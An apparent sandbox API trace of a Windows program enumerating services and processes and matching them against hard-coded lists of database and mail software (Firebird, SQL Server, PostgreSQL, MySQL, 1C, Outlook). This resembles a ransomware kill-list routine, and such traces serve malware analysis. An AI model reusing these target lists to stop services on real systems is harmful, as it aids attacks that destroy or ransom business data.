	[0146.096] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0146.096] EnumServicesStatusExW (in: hSCManager=0xb617020, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0146.096] CloseServiceHandle (hSCObject=0xb617020) returned 1
	[0146.096] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0146.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0146.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0146.096] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0146.096] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0146.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0146.096] lstrlenW (lpString="AudioSrv") returned 8
	[0146.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0146.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0146.096] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0146.096] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0146.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0146.096] lstrlenW (lpString="BFE") returned 3
	[0146.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0146.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0146.097] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0146.097] lstrlenW (lpString="CryptSvc") returned 8
	[0146.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0146.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0146.097] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0146.097] lstrlenW (lpString="CscService") returned 10
	[0146.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0146.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0146.097] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0146.097] lstrlenW (lpString="DcomLaunch") returned 10
	[0146.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0146.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0146.097] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0146.097] lstrlenW (lpString="Dhcp") returned 4
	[0146.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0146.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0146.097] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0146.097] lstrlenW (lpString="Dnscache") returned 8
	[0146.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0146.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0146.097] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0146.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0146.097] lstrlenW (lpString="DPS") returned 3
	[0146.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0146.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0146.098] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0146.098] lstrlenW (lpString="eventlog") returned 8
	[0146.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0146.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0146.098] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0146.098] lstrlenW (lpString="EventSystem") returned 11
	[0146.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0146.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0146.098] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0146.098] lstrlenW (lpString="gpsvc") returned 5
	[0146.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0146.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0146.098] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0146.098] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0146.098] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0146.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0146.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0146.098] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0146.098] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0146.098] lstrlenW (lpString="lmhosts") returned 7
	[0146.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0146.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0146.098] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0146.098] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0146.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0146.099] lstrlenW (lpString="MMCSS") returned 5
	[0146.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0146.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0146.099] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0146.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0146.099] lstrlenW (lpString="MpsSvc") returned 6
	[0146.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0146.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0146.099] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0146.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0146.099] lstrlenW (lpString="NlaSvc") returned 6
	[0146.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0146.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0146.099] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0146.099] lstrlenW (lpString="nsi") returned 3
	[0146.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0146.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0146.099] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0146.099] lstrlenW (lpString="PcaSvc") returned 6
	[0146.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0146.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0146.099] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0146.099] lstrlenW (lpString="PlugPlay") returned 8
	[0146.099] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0146.099] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0146.099] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0146.100] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0146.100] lstrlenW (lpString="Power") returned 5
	[0146.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0146.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0146.100] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0146.100] lstrlenW (lpString="ProfSvc") returned 7
	[0146.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0146.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0146.100] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0146.100] lstrlenW (lpString="RpcEptMapper") returned 12
	[0146.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0146.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0146.100] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0146.100] lstrlenW (lpString="RpcSs") returned 5
	[0146.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0146.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0146.100] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0146.100] lstrlenW (lpString="SamSs") returned 5
	[0146.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0146.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0146.100] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0146.100] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0146.100] lstrlenW (lpString="Schedule") returned 8
	[0146.100] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0146.100] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0146.101] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0146.101] lstrlenW (lpString="SENS") returned 4
	[0146.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0146.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0146.101] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0146.101] lstrlenW (lpString="ShellHWDetection") returned 16
	[0146.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0146.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0146.101] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0146.101] lstrlenW (lpString="Spooler") returned 7
	[0146.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0146.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0146.101] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0146.101] lstrlenW (lpString="Themes") returned 6
	[0146.101] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0146.101] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0146.101] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0146.101] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0146.102] lstrlenW (lpString="UxSms") returned 5
	[0146.102] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0146.102] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0146.102] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0146.102] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0146.102] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0146.102] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0146.102] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8
	[0146.103] Process32FirstW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0146.103] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0146.104] lstrlenW (lpString="System") returned 6
	[0146.104] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0146.104] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0146.104] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0146.104] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0146.104] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0146.104] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0146.104] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0146.104] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0146.104] lstrlenW (lpString="smss.exe") returned 8
	[0146.104] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0146.104] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0146.104] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0146.104] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0146.104] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0146.104] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0146.104] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0146.104] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0146.105] lstrlenW (lpString="csrss.exe") returned 9
	[0146.105] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0146.105] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0146.105] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0146.105] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0146.105] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0146.105] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0146.105] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0146.105] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0146.105] lstrlenW (lpString="wininit.exe") returned 11
	[0146.105] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0146.105] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0146.105] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0146.105] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0146.105] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0146.105] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0146.105] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0146.106] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0146.106] lstrlenW (lpString="csrss.exe") returned 9
	[0146.106] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0146.106] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0146.106] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0146.106] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0146.106] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0146.106] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0146.106] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0146.106] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0146.106] lstrlenW (lpString="winlogon.exe") returned 12
	[0146.106] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0146.106] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0146.106] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0146.106] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0146.106] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0146.107] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0146.107] lstrlenW (lpString="services.exe") returned 12
	[0146.107] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0146.107] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0146.107] lstrlenW (lpString="lsass.exe") returned 9
	[0146.107] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0146.107] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0146.107] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0146.107] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0146.108] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0146.108] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0146.108] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0146.108] lstrlenW (lpString="lsm.exe") returned 7
	[0146.108] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0146.108] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0146.108] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0146.108] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0146.108] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0146.108] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0146.108] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0146.108] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.108] lstrlenW (lpString="svchost.exe") returned 11
	[0146.108] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.108] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.108] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.108] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0146.108] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0146.109] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.109] lstrlenW (lpString="svchost.exe") returned 11
	[0146.109] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
